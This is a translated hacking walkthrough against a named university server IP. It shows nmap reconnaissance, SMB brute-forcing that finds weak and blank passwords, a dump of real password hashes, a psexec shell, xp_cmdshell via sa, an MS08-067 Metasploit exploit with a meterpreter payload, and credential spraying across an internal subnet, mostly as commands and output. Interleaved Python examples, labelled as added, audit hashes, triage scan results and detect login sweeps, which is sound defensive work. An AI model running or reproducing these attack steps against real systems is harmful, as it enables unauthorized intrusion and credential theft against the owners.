Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r(
SF:GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb // list the scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser // scan result
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 // grab hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

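The hash dump above doubles as the quickest password-policy audit of the host. The Python below is an added example, not part of the original post and not code from Nmap or pwdump: it parses smb-pwdump lines in the format shown and flags accounts with an empty password, accounts whose LM hash is still stored (Windows 2000 stores it by default; the NoLMHash policy turns that off), and LM hashes whose second half is the well-known empty-block constant AAD3B435B51404EE, which means the password is seven characters or shorter, exactly what the test:123456 entry shows. The constants are documented LM/NT properties; the sample input is the post's own output.

```python
import re

# Documented LM/NT constants (not from the post): the LM hash is two independent DES
# encryptions of 7-character halves; an empty half always yields AAD3B435B51404EE, and
# the NT hash of the empty password is 31D6CFE0D16AE931B73C59D7E0C089C0.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# smb-pwdump host-script lines as printed above: "| user:rid => LMHASH:NTHASH".
# pwdump6 prints "NO PASSWORD*****" in place of a hash that equals the empty-password hash.
LINE_RE = re.compile(r"^\|_?\s*(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+?)\s*$")

# Sample input copied from the smb-pwdump output in this post.
SAMPLE_DUMP = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""


def parse_pwdump_line(line):
    """Return {'user', 'rid', 'lm', 'nt'} for one dump line, or None for non-account lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    lm, nt = m.group("lm").strip().upper(), m.group("nt").strip().upper()
    if lm.startswith("NO PASSWORD"):
        lm = EMPTY_LM
    if nt.startswith("NO PASSWORD"):
        nt = EMPTY_NT
    return {"user": m.group("user").strip(), "rid": int(m.group("rid")), "lm": lm, "nt": nt}


def audit_account(acct):
    """Return finding codes for one account; an empty list means nothing to report."""
    codes = []
    if acct["nt"] == EMPTY_NT:
        codes.append("EMPTY_PASSWORD")
    if acct["lm"] != EMPTY_LM:
        codes.append("LM_HASH_STORED")           # case-insensitive, attacked 7 chars at a time
        if acct["lm"].endswith(EMPTY_LM_HALF):
            codes.append("PASSWORD_LE_7_CHARS")  # second half is the empty-block constant
    if acct["rid"] == 500 and "EMPTY_PASSWORD" in codes:
        codes.append("BUILTIN_ADMIN_NO_PASSWORD")
    return codes


def audit_dump(text):
    """Map each account in a dump to its finding codes."""
    report = {}
    for line in text.splitlines():
        acct = parse_pwdump_line(line)
        if acct is not None:
            report[acct["user"]] = audit_account(acct)
    return report


if __name__ == "__main__":
    for user, codes in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:16s} {', '.join(codes) or 'ok'}")
```

Run against the dump above it reports an empty password on the built-in Administrator and Guest, a stored LM hash with a password of at most seven characters for test, and a stored LM hash for TsInternetUser. The fixes follow directly from the codes: set passwords on the empty accounts, enable NoLMHash, and rotate every password so no LM hash remains in the SAM.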
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

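The smb-enum-shares, smb-brute and smb-check-vulns blocks above each contain one line that matters for remediation. As an added example (not from the post, and not part of Nmap) the Python below turns such output into per-host findings with a severity, so that the same scripts run against one's own network yield a fix list instead of a wall of text: a share reachable anonymously, a login accepted with a blank or guessable password, and an unpatched bulletin. The sample input is assembled from the post's own three outputs; the severity labels are this example's own choice.

```python
import re

# Sample input assembled from the three host-script outputs in this post
# (one host, the three scans concatenated in the order they were run).
SAMPLE_NMAP = """\
Nmap scan report for bogon (202.103.242.241)
Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
Nmap scan report for bogon (202.103.242.241)
Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful
Nmap scan report for bogon (202.103.242.241)
Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE
"""

# Nmap's normal-output conventions: the host header carries the IP, host-script lines
# start with "| " or "|_ ", and each script block opens with "| <script-name>:".
HOST_RE = re.compile(r"^Nmap scan report for .*?(\d{1,3}(?:\.\d{1,3}){3})\)?\s*$")
SCRIPT_RE = re.compile(r"^\|_?\s*(?P<name>smb-[\w-]+):\s*$")
SHARE_RE = re.compile(r"^\|_?\s*(?P<share>[^\s:]+)\s*$")
ANON_RE = re.compile(r"^\|_?\s*Anonymous access:\s*(?P<level>\S+)")
LOGIN_RE = re.compile(r"^\|_?\s*(?P<user>[^:\s]+):(?P<secret>\S+)\s*=>\s*Login was successful")
VULN_RE = re.compile(r"^\|_?\s*(?P<id>MS\d{2}-\d{3}):\s*(?P<status>[A-Z_]+)")


def triage(text):
    """Map each scanned IP to a list of (severity, message) findings."""
    findings = {}
    host = script = share = None
    for line in text.splitlines():
        line = line.rstrip()
        m = HOST_RE.match(line)
        if m:
            host, script, share = m.group(1), None, None
            findings.setdefault(host, [])
            continue
        if host is None or not line.startswith("|"):
            continue  # port table, banners and blank lines are not host-script output
        m = SCRIPT_RE.match(line)
        if m:
            script, share = m.group("name"), None
            continue
        if script == "smb-enum-shares":
            m = ANON_RE.match(line)
            if m:
                if share and m.group("level") != "<none>":
                    msg = f"{share} grants anonymous {m.group('level')} access (null-session enumeration)"
                    findings[host].append(("medium", msg))
            else:
                m = SHARE_RE.match(line)
                if m:
                    share = m.group("share")
        elif script == "smb-brute":
            m = LOGIN_RE.match(line)
            if m:
                blank = m.group("secret") == "<blank>"
                kind = "blank" if blank else "guessable"
                findings[host].append(("critical" if blank else "high",
                                       f"account {m.group('user')} accepts a {kind} password"))
        elif script == "smb-check-vulns":
            m = VULN_RE.match(line)
            if m and m.group("status") == "VULNERABLE":
                findings[host].append(("critical", f"{m.group('id')} not patched"))
    return findings


def worst(findings):
    """Highest severity rank for one host's findings (0 when clean), for sorting a fix list."""
    order = {"critical": 3, "high": 2, "medium": 1}
    return max((order[s] for s, _ in findings), default=0)


if __name__ == "__main__":
    for ip, items in sorted(triage(SAMPLE_NMAP).items(), key=lambda kv: -worst(kv[1])):
        for sev, msg in items:
            print(f"{ip:16s} {sev:9s} {msg}")
```

Feeding it the outputs above yields one medium finding (anonymous READ on IPC$), two findings from smb-brute (critical for the blank administrator password, high for test) and a critical MS08-067 entry; a host whose every share reports `<none>` produces an empty list and sorts last.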
root@bt:~# msfconsole // exploit the MS08-067 vulnerability against the target machine from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hashes to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack ~~

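The final sweep tries one account against every host in 192.168.1.1-254 within seconds. On the defending side that shape is the signal: one source and one account touching many hosts in a short window, whether or not the logons succeed. The Python below is an added example (not from the post) over a constructed, normalized logon-event feed with the fields time, source, destination, account and outcome; that layout is an assumption for the example, not any product's log format. It keeps a sliding window per (source, account) pair and raises an alert once the pair has reached four or more distinct hosts within 60 seconds.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, normalized logon-event feed (not real logs, not any product's format):
# "time source destination account outcome" per line. The first five lines mimic a
# one-credential sweep like the one above; the last two are ordinary admin activity.
SAMPLE_EVENTS = """\
2012-02-29T01:10:01 192.168.1.50 192.168.1.101 administrator ok
2012-02-29T01:10:02 192.168.1.50 192.168.1.102 administrator fail
2012-02-29T01:10:03 192.168.1.50 192.168.1.103 administrator ok
2012-02-29T01:10:04 192.168.1.50 192.168.1.104 administrator fail
2012-02-29T01:10:05 192.168.1.50 192.168.1.105 administrator ok
2012-02-29T01:30:00 192.168.1.20 192.168.1.10 jdoe ok
2012-02-29T02:15:00 192.168.1.20 192.168.1.11 jdoe ok
"""


def parse_events(text):
    """Parse the feed into (time, src, dst, account, success) tuples, sorted by time."""
    events = []
    for line in text.strip().splitlines():
        ts, src, dst, account, outcome = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, account.lower(), outcome == "ok"))
    events.sort(key=lambda e: e[0])
    return events


def detect_sweeps(events, window=timedelta(seconds=60), min_hosts=4):
    """Alert on (source, account) pairs that reached >= min_hosts distinct destinations
    within one window. Failures count as much as successes: a sweep with one shared
    credential is a burst either way, and the failures are usually the louder part."""
    recent = defaultdict(deque)  # (src, account) -> deque of (time, dst) inside the window
    alerts = {}                  # (src, account) -> peak number of distinct hosts seen
    for t, src, dst, account, _ok in events:
        key = (src, account)
        q = recent[key]
        q.append((t, dst))
        while t - q[0][0] > window:   # drop events that fell out of the window
            q.popleft()
        hosts = {d for _, d in q}
        if len(hosts) >= min_hosts:
            alerts[key] = max(len(hosts), alerts.get(key, 0))
    return alerts


if __name__ == "__main__":
    for (src, account), n in detect_sweeps(parse_events(SAMPLE_EVENTS)).items():
        print(f"sweep: {account}@{src} authenticated to {n} hosts within 60s")
```

The thresholds are deliberately parameters: a backup or patch-management account legitimately fans out to many hosts, so in practice the pair is allow-listed or the window and host count are tuned per account class rather than globally.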